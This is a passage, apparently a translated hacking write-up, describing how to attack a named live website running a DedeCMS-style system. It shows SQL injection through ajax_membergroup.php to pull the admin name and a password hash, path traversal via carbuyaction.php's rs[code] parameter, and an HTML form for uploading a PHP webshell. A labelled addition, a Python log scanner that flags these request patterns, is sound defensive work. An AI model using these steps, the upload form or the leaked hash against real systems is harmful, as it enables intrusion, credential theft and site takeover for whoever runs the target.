① SQL injection vulnerability.
Site: http://www.political-security.com
First visit the "/data/admin/ver.txt" page to get the system's last upgrade time,
then www.political-security.com/data/mysql_error_trace.inc to expose the admin backend path.
Then visit the "/member/ajax_membergroup.php?action=post&membergroup=1" page; as the screenshot shows, the vulnerability is present.
Then add the statement
to view the admin account:
http://www.political-security.co ... &membergroup=@`
admin
View the admin password:
http://www.political-security.co ... &membergroup=@`
8d29b1ef9f8c5a5af429
The value obtained is 19 characters long; strip the first three and the last one to get the admin's 16-character MD5:
8d2
9b1ef9f8c5a5af42
9
cmd5 couldn't crack it, so I had to test the second method.
② Upload vulnerability:
Just log in to the member centre, then visit the page link
"/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post"
As the screenshot shows, the upload page "/dialog/select_soft_post" has been successfully called through "/plus/carbuyaction.php".
So rename the PHP one-line webshell's extension to "rar" or similar, and use the submission page upload1.htm:
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="myfile.Php"/>
<button class="button2" type="submit">提交</button><br><br>
</form>
Or
and the upload then succeeds.
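As an added defender-side example (not part of the original post), a small Python scanner that flags the three request patterns the post relies on in web server access logs: reads of /data/mysql_error_trace.inc, a non-numeric membergroup parameter sent to /member/ajax_membergroup.php, and a path-traversing rs[code] parameter sent to /plus/carbuyaction.php. The paths and parameter names come from the post; the log lines, regex and alert labels are constructed here, and the non-numeric check is a heuristic.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2012:10:01:02 +0800] "GET /member/ajax_membergroup.php?action=post&membergroup=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2012:10:01:09 +0800] "GET /member/ajax_membergroup.php?action=post&membergroup=@%60 HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2012:10:02:30 +0800] "GET /data/mysql_error_trace.inc HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Mar/2012:10:03:00 +0800] "POST /plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs%5Bcode%5D=../dialog/select_soft_post HTTP/1.1" 200 300 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2012:10:04:00 +0800] "GET /plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888 HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def classify_request(target: str) -> Optional[str]:
    """Return an alert label if the request target matches one of the patterns, else None."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()          # decode %xx in the path before comparing
    qs = parse_qs(parts.query, keep_blank_values=True)  # parse_qs also percent-decodes
    if path.endswith("/data/mysql_error_trace.inc"):
        return "mysql_error_trace_read"         # error-trace file should never be served
    if path.endswith("/member/ajax_membergroup.php"):
        for value in qs.get("membergroup", []):
            if not value.isdigit():             # a group id is an integer; anything else is suspect
                return "ajax_membergroup_nonnumeric"
    if path.endswith("/plus/carbuyaction.php"):
        for value in qs.get("rs[code]", []):
            if ".." in value or "/" in value:   # rs[code] must not name another file
                return "carbuyaction_rs_code_traversal"
    return None


def scan_log(text: str) -> List[Tuple[str, str, str]]:
    """Return (client ip, request target, label) for every line that raises an alert."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                            # skip lines that are not combined-format entries
        label = classify_request(m.group("target"))
        if label:
            alerts.append((m.group("ip"), m.group("target"), label))
    return alerts
```

Run against the constructed sample it raises three alerts (one per pattern) and ignores the benign membergroup=1 and rs[code]-less requests.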